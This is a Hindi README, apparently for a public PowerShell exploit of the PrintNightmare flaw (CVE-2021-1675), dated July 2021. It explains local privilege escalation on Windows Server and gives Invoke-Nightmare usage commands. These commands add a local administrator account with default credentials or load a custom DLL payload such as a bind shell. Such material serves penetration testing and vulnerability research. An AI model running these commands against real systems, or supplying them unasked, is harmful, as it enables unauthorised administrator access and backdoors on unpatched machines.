
# PrintNightmare के माध्यम से Windows स्थानीय विशेषाधिकार वृद्धि के लिए PowerShell स्क्रिप्ट PowerShell स्क्रिप्ट जो PrintNightmare भेद्यता (CVE-2021-1675) के माध्यम से Windows पर स्थानीय विशेषाधिकार वृद्धि के लिए उपयोग की जाती है, जिसमें स्थानीय व्यवस्थापक उपयोगकर्ता जोड़ना या कस्टम DLL पेलोड निष्पादित करना शामिल है।
Caleb Stewart | John Hammond | 1 जुलाई, 2021
CVE-2021-1675 एक गंभीर रिमोट कोड निष्पादन और स्थानीय विशेषाधिकार वृद्धि भेद्यता है, जिसे "PrintNightmare" नाम दिया गया है।
रिमोट कोड निष्पादन क्षमता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जारी किए गए हैं (Python, C++), और स्थानीय विशेषाधिकार वृद्धि के लिए एक C# संस्करण भी उपलब्ध है। हमने शुद्ध PowerShell में कोई मूल कार्यान्वयन नहीं देखा था, और हम एक्सप्लॉइट को परिष्कृत और पुनर्निर्मित करने का प्रयास करना चाहते थे।
यह PowerShell स्क्रिप्ट PrintNightmare आक्रमण तकनीक के साथ स्थानीय विशेषाधिकार वृद्धि (LPE) करती है।

इसका परीक्षण Windows Server 2016 और Windows Server 2019 पर किया गया है।
डिफ़ॉल्ट रूप से स्थानीय व्यवस्थापक समूह में एक नया उपयोगकर्ता जोड़ें:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # डिफ़ॉल्ट रूप से स्थानीय व्यवस्थापक समूह में उपयोगकर्ता `adm1n`/`P@ssw0rd` जोड़ें
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
कुछ और करने के लिए एक कस्टम DLL पेलोड प्रदान करें, जो आप चाहें।
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"